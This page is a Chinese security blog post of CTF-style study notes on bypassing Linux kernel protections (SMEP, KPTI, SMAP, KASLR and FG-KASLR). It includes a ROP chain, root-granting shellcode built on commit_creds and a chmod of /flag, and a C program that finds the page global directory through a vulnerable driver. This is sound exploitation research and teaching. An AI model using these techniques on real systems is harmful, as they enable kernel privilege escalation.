
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>Linux Kernel 保护机制绕过 - RainSec</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="RainSec,"> 
    <meta name="description" content="致力于云原生安全和自动化渗透测试的研究与分享,Linux Kernel 保护机制绕过
好久没搞kernel的洞了，最近分析的这方面的洞有点多，相关的Exp任务也比较多，因此学习总结一下方便查找和记忆。

SMEP + KPTI bypass​ ,"> 
    <meta name="author" content="RainSec"> 
    <link rel="alternative" href="atom.xml" title="RainSec" type="application/atom+xml"> 
    <link rel="icon" href="https://cdn.staticaly.com/gh/L2ksy0d/image-host@master/20220714/logo.jpg"> 
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1429596_nzgqgvnmkjb.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.7.2/animate.min.css">

    
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/codemirror.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/theme/dracula.css">

    
<link rel="stylesheet" href="/css/obsidian.css">

    
<link rel="stylesheet" href="/css/ball-atom.min.css">

    
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome/css/font-awesome.min.css">

    
    <script>var musiclist = ""</script>
    
<script src="/js/loadaplayer.js"></script>

    <!-- 引用依赖 -->
    
<link rel="stylesheet" href="/aplayer/dist/APlayer.min.css">

    
<script src="/aplayer/dist/APlayer.min.js"></script>
<script src="/js/Meting.min.js"></script>

    
<meta name="generator" content="Hexo 6.0.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>


<body class="loading">
    <div class="loader">
        <div class="la-ball-atom la-2x">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <span id="config-title" style="display:none">RainSec</span>
    <div id="loader"></div>
    <div id="single">
    <div class="scrollbar gradient-bg-rev"></div>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <div class="navigation animated fadeIn fast delay-1s">
        <img id="home-icon" class="icon-home" src="https://cdn.staticaly.com/gh/L2ksy0d/image-host@master/20220714/logo.jpg" alt="" data-url="https://rainsec.cn">
        <div id="play-icon" title="Play/Pause" class="iconfont icon-play"></div>
        <h3 class="subtitle">Linux Kernel 保护机制绕过</h3>
        <div class="social">
            <!--        <div class="like-icon">-->
            <!--            <a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
            <!--        </div>-->
            <div>
                <div class="share">
                    
                        <a href="javascript:;" class="iconfont icon-share1"></a>
                        <div class="share-component-cc" data-disabled="facebook,douban,linkedin,diandian,tencent,google"></div>
                    
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="section">
        <div class=article-header-wrapper>
    <div class="article-header">
        <div class="article-cover animated fadeIn" style="
            animation-delay: 600ms;
            animation-duration: 1.2s;
            background-image: 
                radial-gradient(ellipse closest-side, rgba(0, 0, 0, 0.65), #100e17),
                url('https://cdn.staticaly.com/gh/L2ksy0d/image-host@master/20220720/kernelcover.png') ">
        </div>
        <div class="else">
            <p class="animated fadeInDown">
                
                <a href="/categories/Linux Kernel"><b>「
                    </b>LINUX KERNEL<b> 」</b></a>
                
                July 19, 2022
            </p>
            <h3 class="post-title animated fadeInDown"><a href="/post/Linux%20Kernel%20%E4%BF%9D%E6%8A%A4%E6%9C%BA%E5%88%B6%E7%BB%95%E8%BF%87.html" title="Linux Kernel 保护机制绕过" class="">Linux Kernel 保护机制绕过</a>
            </h3>
            
            <p class="post-count animated fadeInDown">
                
                <span>
                    <b class="iconfont icon-text2"></b> <i>Words count</i>
                    19k
                </span>
                
                
                <span>
                    <b class="iconfont icon-timer__s"></b> <i>Reading time</i>
                    17 mins.
                </span>
                
                
                
                <span id="busuanzi_container_page_pv">
                    <b class="iconfont icon-read"></b> <i>Read count</i>
                    <span id="busuanzi_value_page_pv">0</span>
                </span>
                
            </p>
            
            
            <ul class="animated fadeInDown post-tags-list" itemprop="keywords"><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/Linux-Kernel/" rel="tag">Linux Kernel</a></li></ul>
            
        </div>
    </div>
</div>

<div class="screen-gradient-after">
    <div class="screen-gradient-content">
        <div class="screen-gradient-content-inside">
            <div class="bold-underline-links screen-gradient-sponsor">
                <p>
                    <span class="animated fadeIn delay-1s"></span>
                </p>
            </div>
        </div>
    </div>
</div>

<div class="article">
    <div class='main'>
        <div class="content markdown animated fadeIn">
            <h1 id="Linux-Kernel-保护机制绕过"><a href="#Linux-Kernel-保护机制绕过" class="headerlink" title="Linux Kernel 保护机制绕过"></a>Linux Kernel 保护机制绕过</h1><blockquote>
<p>好久没搞kernel的洞了，最近分析的这方面的洞有点多，相关的Exp任务也比较多，因此学习总结一下方便查找和记忆。</p>
</blockquote>
<h2 id="SMEP-KPTI-bypass"><a href="#SMEP-KPTI-bypass" class="headerlink" title="SMEP + KPTI bypass"></a>SMEP + KPTI bypass</h2><p>​        SMEP是SupervisorModeExecutionPrevention的缩写，主要的作用其实就是抵御类似ret2user这样的攻击，简单来说就是阻止内核执行用户态传递的代码。</p>
<p>​        检测计算机是否开启SMEP保护的方式很简单，<code>cat /proc/cpuinfo | grep smep</code>，如果有匹配到一些信息的话就说明计算机开启了SMEP保护。在CTF赛事中一般会给一些kernel启动的sh脚本，从这些脚本里面我们也可以看出虚拟机在启动kernel时是否开启了SMEP保护：</p>
<pre><code class="shell">#!/bin/sh

qemu-system-x86_64 -initrd initramfs.cpio \
-kernel bzImage \
-append 'console=ttyS0 oops=panic panic=1 nokaslr' \
-monitor /dev/null \
-m 64M --nographic \
-smp cores=1,threads=1 \
</code></pre>
<p>这里是没开启SMEP的脚本，如果在脚本里面加入SMEP相关的cpu参数那么就是开启了SMEP机制。</p>
<pre><code class="shell">#!/bin/sh

qemu-system-x86_64 -initrd initramfs.cpio \
-kernel bzImage \
-append 'console=ttyS0 oops=panic panic=1 nokaslr' \
-monitor /dev/null \
-m 64M --nographic \
-smp cores=1,threads=1 \
-cpu kvm64,smep
</code></pre>
<p>还有一种判断SMEP机制是否开启的方法是通过cr4寄存器的值：<img src="https://cdn.jsdelivr.net/gh/L2ksy0d/image-host@master/20220325/image-20220319114934180.png" alt="image-20220319114934180"></p>
<p>第20位代表的就是SMEP机制是否开启，获取cr4寄存器值的方法也很简单，一种可以通过debuger去attach要调试的kernel，另一种就是通过触发SMEP机制的crash<img src="https://cdn.jsdelivr.net/gh/L2ksy0d/image-host@master/20220325/image-20220319123657869.png" alt="image-20220319123657869"></p>
<p>​        KPTI机制更多的是一种页表隔离的机制，当在用户态和内核态之间进行状态切换的时候KPTI机制会尽量减少用户态页表中的内核地址，同时内核页表中所有的用户态页都被设置为NX使得用户态的页不具备可执行权限，这是一种防范<code>Meltdown</code>类似攻击的机制。</p>
<p>​        检测KPTI机制是否开启的方法有很多，<code>cat /proc/cpuinfo | grep pti</code>或者类似上面说到的cpu参数<code>-cpu kvm64,smep</code>，或者检查进程页表，但是这需要你可以查看物理内存，通过内核任意读取的原语可以做到，但是需要进行虚拟地址和物理地址之间的转换，这就需要你具备一定的内存管理知识和多级页表相关知识，这些基础知识这里就不细说了，下面举例一些demo看如何获取相关物理地址。</p>
<pre><code class="c">void *pgd = get_current()-&gt;mm-&gt;pgd;
</code></pre>
<p>get_current() 会帮助获取当前的<code>task_struct</code>，然后得到<code>mm_struct</code>结构体类型的mm成员，所有的进程地址空间都包含该结构体里面，其中pgd字段代表的是全局页目录，拿到地址之后进行页表地址转换就可以拿到对应的物理地址，那么在多级页表的处理过程中可以拿到每一级页表的入口地址，该地址的NX bit就表明该页表是否开启了NX，结论就是，正常情况下每一级页表的NX位是没设置的，但是全局页目录设置了NX bit，因为在多级页表解析的过程中全局页目录是共享的。</p>
<h3 id="ROP绕过"><a href="#ROP绕过" class="headerlink" title="ROP绕过"></a>ROP绕过</h3><p>​        内核里面的rop和用户态其实是非常相似的，做rop最基本的就是先获取到<code>vmlinux</code>，以ctf赛题来说一般提供的都是压缩后的bzImage，这里可以通过<a target="_blank" rel="noopener" href="https://github.com/marin-m/vmlinux-to-elf">vmlinux-to-elf</a>工具来实现解压缩：</p>
<pre><code class="shell">./vmlinux-to-elf &lt;input_kernel.bin&gt; &lt;output_kernel.elf&gt;
</code></pre>
<p>然后通过ROPgadget或者ropper从vmlinux里面获取gadget</p>
<pre><code class="shell">ROPgadget --binary vmlinux &gt; gadgets
</code></pre>
<p>gadget的寻找原则其实不是固定的，要看场景丁需求，不过类似<code>mov esp, 0xf7000000 ; ret</code>这样的一般都很不错（注意常量一定要对齐），可以将esp指向我们分配的地址然后接下来的ret操作就容易被控制进而执行rop链。但是ROPgadget是不会检查相关段是否开启了NX的。</p>
<p>​        对于SMEP来说，它由<code>cr4</code>寄存器控制，因此可以通过改变<code>cr4</code>寄存器的第20 bit的值来进行绕过，比如使用<code>native_write_cr4</code>函数：</p>
<pre><code class="c">void native_write_cr4(unsigned long val)
{
    unsigned long bits_missing = 0;

set_register:
    asm volatile("mov %0,%%cr4": "+r" (val), "+m" (cr4_pinned_bits));

    if (static_branch_likely(&amp;cr_pinning)) {
        if (unlikely((val &amp; cr4_pinned_bits) != cr4_pinned_bits)) {
            bits_missing = ~val &amp; cr4_pinned_bits;
            val |= bits_missing;
            goto set_register;
        }
        /* Warn after we've set the missing bits. */
        WARN_ONCE(bits_missing, "CR4 bits went missing: %lx!?\n",
              bits_missing);
    }
}
EXPORT_SYMBOL(native_write_cr4);
</code></pre>
<p>但是从代码里面的警告就可以看出，在较新版本的内核中，该函数已经不能改变第20bit和第21bit的值了，</p>
<p>​        对于<code>KPTI</code>就比较麻烦了，一种方法是如果具备内核任意读写和当前进程页表的地址，那么就可以直接通过关闭NX bit来实现，但是都任意读写了，直接修改cred结构体可能会更香一点。那么最好的方式其实应该去利用kernel本身的代码来帮助实现这一绕过过程，下面是<a target="_blank" rel="noopener" href="https://github.com/torvalds/linux/blob/7ac63f6ba5db5e2e81e4674551d6f9ec58e70618/arch/x86/entry/entry_64.S">kernel entry</a>的部分代码，主要是用于内核态到用户态的切换，这其实很符合exp的需求，原本exp不能成功执行的主要原因就是在返回用户态之后执行的代码所在页其实属于内核，这个切换它成功的进行了页表切换，因接下来用到的就是用户态的页表，。</p>
<pre><code class="asm">GLOBAL(swapgs_restore_regs_and_return_to_usermode)
#ifdef CONFIG_DEBUG_ENTRY
    /* Assert that pt_regs indicates user mode. */
    testb    $3, CS(%rsp)
    jnz    1f
    ud2
1:
#endif
    POP_REGS pop_rdi=0

    /*
     * The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
     * Save old stack pointer and switch to trampoline stack.
     */
    movq    %rsp, %rdi
    movq    PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp

    /* Copy the IRET frame to the trampoline stack. */
    pushq    6*8(%rdi)    /* SS */
    pushq    5*8(%rdi)    /* RSP */
    pushq    4*8(%rdi)    /* EFLAGS */
    pushq    3*8(%rdi)    /* CS */
    pushq    2*8(%rdi)    /* RIP */

    /* Push user RDI on the trampoline stack. */
    pushq    (%rdi)

    /*
     * We are on the trampoline stack.  All regs except RDI are live.
     * We can do future final exit work right here.
     */
    STACKLEAK_ERASE_NOCLOBBER

    SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi

    /* Restore RDI. */
    popq    %rdi
    SWAPGS
    INTERRUPT_RETURN
</code></pre>
<p>到此，其实就不难理解为什么kernel exp里面很多类似这样的ROP code:</p>
<pre><code class="c">    pivot_stack[0] = 0xcafedeadbeef;

    pivot_stack[i++] = pop_rdi;
    pivot_stack[i++] = 0;
    pivot_stack[i++] = prepare_kernel_cred;
    pivot_stack[i++] = pop_rdx;
    pivot_stack[i++] = 8;
    pivot_stack[i++] = cmp;
    pivot_stack[i++] = mov_rdi_rax;
    pivot_stack[i++] = commit_creds;

    pivot_stack[i++] = kpti_trampoline;
    pivot_stack[i++] = 0x12345678; // RAX
    pivot_stack[i++] = 0x87654321; // RDI
    pivot_stack[i++] = (unsigned long)u_code; //userspace_rip;
    pivot_stack[i++] = 0x33; //userspace_cs;
    pivot_stack[i++] = 0x246; //userspace_rflags;
    pivot_stack[i++] = (unsigned long)u_stack; //userspace_rsp;
    pivot_stack[i++] = 0x2b; //userspace_ss;
</code></pre>
<p>至于最开始的0xcafedeadbeef，这其实是为了触发<code>page fault handler</code>，因此根据linux demand-on-paging的原则，只有触发该handler的情况下才会真正mmaping。</p>
<p>​        还有一种方法是通过<a target="_blank" rel="noopener" href="https://trungnguyen1909.github.io/blog/post/matesctf/KSMASH/">signal handler</a>。</p>
<h3 id="get-root"><a href="#get-root" class="headerlink" title="get root"></a>get root</h3><p>​        获取root权限的方式在内核里面还算比较统一的，基本很多都是通过</p>
<ol>
<li><code>commit_creds(prepare_kernel_cred(0))</code>。</li>
<li>确定cred structure结构体的地址来进行权限提升。</li>
<li>ctf里面可能会用到的方法就是通过chmod 修改flag文件为777权限然后挂起，然后通过用户空间的一个进程来读取文件内容。</li>
</ol>
<p>​    那么shellcode的写法就比较直接了，假设通过<code>cat /proc/kallsyms</code>得到了<code>grep commit_creds</code>和<code>grep prepare_kernel_cred</code>的地址：</p>
<pre><code class="asm">xor rdi, rdi
mov rcx, prepare_kernel_cred_addr
call rcx
mov rdi, rax
mov rcx, commit_creds_addr
call rcx
ret
</code></pre>
<p>这种shellcode没有做内核地址空间与用户地址空间的转换，因此可能比较局限，适用于仅仅存在一个<code>retun 0</code>类似指令的目标函数。为了适配更多的场景，需要做内核态和用户态的上下文切换，在linux kernel <a target="_blank" rel="noopener" href="https://github.com/torvalds/linux/blob/master/arch/x86/entry/entry_64.S">源码</a>中详细介绍了如何进入内核态：</p>
<blockquote>
<p>64-bit SYSCALL saves rip to rcx, clears rflags.RF, then saves rflags to r11,then loads new ss, cs, and rip from previously programmed MSRs.rflags gets masked by a value from another MSR (so CLD and CLACare not needed). SYSCALL does not save anything on the stackand does not change rsp.</p>
<p>注：<a target="_blank" rel="noopener" href="https://wiki.osdev.org/Model_Specific_Registers">MSR</a></p>
</blockquote>
<p>从内核态返回用户态可以通过Linux提供的一些指令<code>SYSRET</code>，<code>SYSEXIT</code>，<code>IRET</code>，其中SYSRET和IRET可以适用于所有的CPU供应商，并且被包含在<code>x86_64</code>的标准里面，SYSRET需要利用MSR特殊读写指令因而较为麻烦，因此一般采用<code>IRET</code>。该指令的含义就是从中断返回，通过查看AMD64手册可以看出在保护模式下<code>IRET</code>对应<code>IRETQ</code>，那么我们只需要在执行<code>IRETQ</code>之前按顺序放置好RIP, CS, RFLAGS, RSP, SS，最后还需要知道的时候<code>swapgs</code>指令，它的语义是：Exchange GS base with KernelGSBase MSR，在linux syscall entry的代码哪里也存在该指令的调用，因此在通过system call返回用户空间的时候我们需要再做一次<code>swapgs</code>用于恢复GS。</p>
<pre><code class="asm">swapgs

push userspace_ss
push userspace_rsp
push userspace_rflags
push userspace_cs
push userspace_rip
iretq
</code></pre>
<p>​        还有一种方法就是上述的第三条，第一步需要先找到chmod func的地址：</p>
<p><img src="https://cdn.jsdelivr.net/gh/L2ksy0d/image-host@master/20220325/image-20220320092704328.png" alt="image-20220320092704328"></p>
<p>可以看到<code>__x64_sys_chmod</code>的地址是<code>0xffffffff872dacf0</code>，在内核调试中对该地址下断点就可以得到该如何给它附加参数：</p>
<pre><code class="asm">    movzx  edx, word ptr [rdi + 0x68]
    mov    rsi, qword ptr [rdi + 0x70]
    mov    edi, 0xffffff9c
    call   0xffffffff811a1b50
</code></pre>
<p>不过要记得，<code>/flag</code>字符串存放地址应该使用内核空间地址，同时由于Linux kernel本身采用的是<strong>Non-Preemptive Threading Model</strong>，因此在kernel thred的执行过程中一般不会进行上下文切换，除非调用了特殊的API，通过sleep当前thread其实就是一个很好的迫使kernel进行上下文切换的，当然kernel里面的sleep和用户态有很大的差别，需要调用不同的API，这里我选择的是msleep():</p>
<p><img src="https://cdn.jsdelivr.net/gh/L2ksy0d/image-host@master/20220325/image-20220320101601670.png" alt="image-20220320101601670"></p>
<p>那么，完整的shellcode就有了：</p>
<pre><code class="asm">; commit_cred(prepare_kernel_creds(0))
xor rdi, rdi
mov rcx, prepare_kernel_cred_addr
call rcx
mov rdi, rax
mov rcx, commit_creds_addr
call rcx

; chmod 777 flag
mov r15, 0x67616c662f
mov r14, 0xdeadf00
mov [r14], r15
mov rdi, 0xffffff9c
mov rsi, r14
mov rdx, 0777
mov rcx, x64_chmod_addr
call rcx

; msleep(0x1000000)
mov rdi, 0x1000000
mov rcx, msleep_addr
call rcx
int 3
</code></pre>
<p>然后我们让exp在后台执行，前台执行<code>cat flag</code>实现文件读取。</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>​        在通过ROP编写shellcode的时候要注意两点：</p>
<ol>
<li>在exp中的mmap产生的shellcode地址不在之前kernel访问的页表里面，那么在执行的时候就会触发<a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Double_fault#:~:text=On%20the%20x86%20architecture%2C%20a,interrupt%20handler%20resides%20is%20invalid.">double fault</a>。</li>
<li>栈指针必须在向上向下两个方向上都还剩比较宽阔的空间<code>unsigned long *pivot_stack = mmap((void *)0xf7000000-0x1000, 0x1000+0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);</code>，因为Linux kernel func 比如 <code>commit_creds</code>需要使用栈空间并且不能使用低于0xf7000000大小的地址，否则会引起uncatchable page fault，<code>MAP_GROWSDOWN</code>是无效的，因为它只能用于用户态。</li>
</ol>
<h2 id="SMEP-PTI-SMAP-KASLR-bypass"><a href="#SMEP-PTI-SMAP-KASLR-bypass" class="headerlink" title="SMEP+PTI+SMAP+KASLR bypass"></a>SMEP+PTI+SMAP+KASLR bypass</h2><blockquote>
<p>KASLR就不多解释了，就是一个kernel的地址随机化</p>
</blockquote>
<h3 id="SMAP"><a href="#SMAP" class="headerlink" title="SMAP"></a>SMAP</h3><p>​        SMAP是<code>Supervisor Mode Access Prevention</code>，它使得用户态的指针无法在内核态被解引用，这无疑会使得ROP难以有效使用。</p>
<p>​        在qemu里面<code>-cpu kvm64,smep,smap</code>表明开启了SMAP机制，当然<code>cat /proc/cpuinfo | grep smap</code>也可以看出来。</p>
<h3 id="SMAP-bypass"><a href="#SMAP-bypass" class="headerlink" title="SMAP bypass"></a>SMAP bypass</h3><p>​        通过分析linux kernel的mmap实现其实就可以知道我们可以通过类似linux kernel heap spray的方式将用户空间的代码映射到内核里面，只需要用<strong>MAP_POPULATE</strong>的flag:</p>
<pre><code>       MAP_POPULATE (since Linux 2.5.46)
              Populate (prefault) page tables for a mapping.  For a file mapping, this causes read-ahead on the file.  This will help to reduce blocking on page faults later.  The mmap() call doesn't fail if the mapping cannot be populated (for example, due to limitations on the number of mapped huge pages when using MAP_HUGETLB).  MAP_POPULATE is supported for private mappings only since Linux 2.6.23.
</code></pre>
<p>这是因为在通过该flag进行mmap的时候，物理页也会同时被映射而不是想之前按需映射的方式。下面是一个github提供的demo可以测算可mmap的地址大小：</p>
<pre><code class="c">#include &lt;stdio.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/fcntl.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;sys/stat.h&gt;

int main (int argc, char **argv){
    int cnt = 0;
    void *pg;

    while(1) {
        pg = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0);
        if (pg == MAP_FAILED) {
            perror("mmap");
            break;
        }
        else {
            cnt++;
            if (cnt % 1000 == 0) {
                printf("[*] allocated %d pages, asking for more...\n", cnt);
            }
        }
    }

    printf("[*] number of pages allocated: %d\n", cnt);
    return 0;
}
</code></pre>
<p>通过实验得出结论就是尽管RAM很小，但是最大mmap的值是它的数倍，同时该值会根据内存资源的大小来发生变化。同时物理页的分配有一个特点，<strong>那就是它们一般都是连续分配的</strong>。如此通过大量的mmap地址并填充信息，最终其实是可以在内核里面访问到这些信息的，如此就可以绕过SMAP的保护，因为我们不需要再解析用户态的指针，而是通过内核地址进行代码执行。</p>
<p>​        那么应该如何获得物理地址呢？通过<a target="_blank" rel="noopener" href="https://www.kernel.org/doc/gorman/html/understand/understand006.html">文档</a>发现，在Linux中每一个进程都维护一个指针<code>mm_struct-&gt;pgd</code>指向该进程的**Page Global Directory (PGD)**，表里面包含的是<code>pgd_t</code>数组，pgd_t定义在<code>asm/page.h</code>里面根据不同的架构拥有不同的值，在x86架构下<code>mm_struct-&gt;pgd</code>会被复制到cr3寄存器。</p>
<p><img src="https://cdn.jsdelivr.net/gh/L2ksy0d/image-host@master/20220325/image-20220321164429738.png" alt="image-20220321164429738"></p>
<p>​        可以知道通过mmap拿到的是虚拟地址，因此需要做一个虚拟地址到屋里地址之间的转换，那么如何获取cr3或者说pgd的值呢，一方面可以通过内核获取另一方面可以通过<code>/proc/(pid)/pagemap</code>获取，还有一种很奇特的方法即是通过映射64bit的[39:48]形成的地址，这里一共是0xff个地址，此时在物理页表中就会生成大量稠密的地址，这些地址会有一些特征，比如：</p>
<ol>
<li>最高位为1。</li>
<li>最低字节为0x67。</li>
</ol>
<p>那么就可以通过遍历内核地址（一般从pageOffsetBase + (0x7c000 &lt;&lt; 12)开始）中的值来判断是否符合自己刚才通过spraying注入的大量地址，如果一个地址的内容符合自己注入的地址，同时索引0x100的结果为0，那么基本就能确定PGD的地址了。</p>
<pre><code class="c">#include &lt;stdio.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/fcntl.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;string.h&gt;

#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444
#define VULN_PB 0x5555

#define SPRAY_CNT 0x10000

struct rwRequest {
    void *kaddr;
    void *uaddr;
    size_t length;
};

unsigned long pageOffsetBase = 0xffff888000000000;

int Open(char *fname, int mode) {
    int fd;
    if ((fd = open(fname, mode)) &lt; 0) {
        perror("open");
        exit(-1);
    }
    return fd;
}

void write64(unsigned long kaddr, unsigned long value) {

    struct rwRequest req;
    unsigned long value_ = value;

    req.uaddr = &amp;value_;
    req.length = 8;
    req.kaddr = (void *)kaddr;

    int fd = Open("/dev/vuln", O_RDONLY);

    if (ioctl(fd, VULN_WRITE, &amp;req) &lt; 0) {
        perror("ioctl");
        exit(-1);
    }
}

unsigned long read64(unsigned long kaddr) {

    struct rwRequest req;
    unsigned long value;;

    req.uaddr = &amp;value;
    req.length = 8;
    req.kaddr = (void *)kaddr;

    int fd = Open("/dev/vuln", O_RDONLY);

    if (ioctl(fd, VULN_READ, &amp;req) &lt; 0) {
        perror("ioctl");
        exit(-1);
    }

    close(fd);

    return value;
}

unsigned long leak_stack() {
    struct rwRequest req;
    unsigned long stack;

    int fd = Open("/dev/vuln", O_RDONLY);

    req.uaddr = &amp;stack;
    if (ioctl(fd, VULN_STACK, &amp;req) &lt; 0) {
        perror("ioctl");
        exit(-1);
    }

    close(fd);

    return stack;
}

unsigned long leak_pgd() {
    struct rwRequest req;
    unsigned long pgd = 0xcccccccc;

    int fd = Open("/dev/vuln", O_RDONLY);

    req.uaddr = &amp;pgd;
    if (ioctl(fd, VULN_PGD, &amp;req) &lt; 0) {
        perror("ioctl");
        exit(-1);
    }

    close(fd);

    return pgd;
}

unsigned long leak_physmap_base() {
    struct rwRequest req;
    unsigned long pgd = 0xcccccccc;

    int fd = Open("/dev/vuln", O_RDONLY);

    req.uaddr = &amp;pgd;
    if (ioctl(fd, VULN_PB, &amp;req) &lt; 0) {
        perror("ioctl");
        exit(-1);
    }

    close(fd);

    return pgd;
}

int check_page(unsigned long addr) {

    unsigned long page[0x101];

    for (int i = 0; i &lt; 0x101; i++) {
        page[i] = read64(addr + i*8);
    }
    for (int i = 0; i &lt; 0x100; i++) {
        if (((page[i] &amp; 0xff) != 0x67) || (!(page[i] &gt;&gt; 63))) {
            return 0;
        }
    }

    return page[0x100] == 0;
}

int main (int argc, char **argv){

    void *pg;
    unsigned long search_addr;
    
    search_addr = pageOffsetBase + (0x7c000 &lt;&lt; 12);
    
    for (unsigned long i = 1; i &lt; 0x100; i++) {
        pg = mmap((void *)(i &lt;&lt; 39), 0x1000, PROT_READ|PROT_WRITE, MAP_POPULATE|MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
        if (pg == MAP_FAILED) {
            perror("mmap");
            exit(-1);
        }
    }

    printf("[*] starting search from addr %p\n", (void *)search_addr);
    
    while(1) {
        if (check_page(search_addr)) {
            printf("[+] located the PGD: %p\n", (void *)search_addr);
            break;
        }
        search_addr += 0x1000;
    }

    printf("[*] this is the actual PGD: %p\n", (void *)leak_pgd());
    
    return 0;
}
</code></pre>
<p>​        如此可以在用户空间通过大量的mmap，然后拿到其物理地址，然后通过内核态的地址转换将该物理地址转换为内核的虚拟地址通过kernel module进行读取就会发现内核可以读取到用户态的数据。</p>
<p>​        如此就知道绕过的原理了，总结一下就是通过内核空间和用户空间确定相同的物理页然后让kernel进行代码执行。</p>
<h3 id="KASLR-bypass"><a href="#KASLR-bypass" class="headerlink" title="KASLR bypass"></a>KASLR bypass</h3><p>​        KASLR其实就是内核态的地址随机化，类似用户态的做法，bypass可以通过确定基地址然后加上固定偏移来解决。但是观察<code>/proc/kallsyms</code>的内容发现一些符号其实是完全自己在随机，而不是拥有一个固定的偏移，这就引出了Linux Kernel的一个机制<a target="_blank" rel="noopener" href="https://lwn.net/Articles/824307/">Function Granular KASLR</a>，简单来说就是内核在加载的时候会以函数级别重新排布内核代码。</p>
<p>​        但是FG-KASLR并不完善，一些内核区域并不会随机化：</p>
<ol>
<li>不幸，commit_creds 和 prepare_kernel_cred在FG-KASLR的区域。</li>
<li>swapgs_restore_regs_and_return_to_usermode和__x86_retpoline_r15函数不受到FG-KASLR影响，这能帮助找到一些gadget。</li>
<li>内核符号表ksymtab不受影响，这里存储了一些偏移可以用于计算prepare_kernel_cred和commit_creds的地址。</li>
</ol>
<p>​        第三个比较感兴趣：</p>
<pre><code class="c">struct kernel_symbol {
      int value_offset;
      int name_offset;
      int namespace_offset;
};
</code></pre>
<p>可以看出<code>value_offset</code>应该是比较有趣的，这个对应的值也可以通过<code>/proc/kallsyms</code>获取：</p>
<p><img src="https://cdn.jsdelivr.net/gh/L2ksy0d/image-host@master/20220325/image-20220323092910382.png" alt="image-20220323092910382"></p>
<p>因此一般就可以在ROP中利用任意读读出相对应的偏移用于计算其它函数的具体位置。</p>
<h2 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h2><p>​        网上看到一段总结，感觉很不错：</p>
<ol>
<li>如果内核没有保护，就直接ret2usr。</li>
<li>如果开了SMEP，就用ROP</li>
<li>溢出或者位置被限制在栈上，就用pivot gadget进行栈迁移。</li>
<li>KPTI利用KPTI trampoline或者signal handler</li>
<li>SMAP会导致stack pivot很难利用</li>
<li>如果没有KASLR，直接泄露地址就能用，开了的话就用基地址 + 偏移。</li>
<li>如果有FG-KASLR，记得利用ksymtab和不受影响的区域。</li>
</ol>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><blockquote>
<p><a target="_blank" rel="noopener" href="https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/">https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/pr0cf5/kernel-exploit-practice">https://github.com/pr0cf5/kernel-exploit-practice</a></p>
</blockquote>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls"
                data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
            <ul id="audio-list" style="display:none">
                
                
                <li title='0' data-url='/statics/chengdu.mp3'></li>
                
                    
            </ul>
            
                        
            
            
    <div id='gitalk-container' class="comment link"
        data-ae='false'
        data-ci=''
        data-cs=''
        data-r=''
        data-o=''
        data-a=''
        data-d=''
        data-p='https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token'
    >Comments</div>


            
            
        </div>
        <div class="sidebar">
            <div class="box animated fadeInRight">
                <div class="subbox">
                    <img src="https://cdn.staticaly.com/gh/L2ksy0d/image-host@master/20220720/clocklogo.jpg" height=300 width=300></img>
                    <p>Clock</p>
                    <span>Love pwn and exploit,Passionate about vulnerability mining and security research.</span>
                    <dl>
                        
                        
                            
                                <dd>
                                    <link rel="stylesheet" type="text/css" href="">
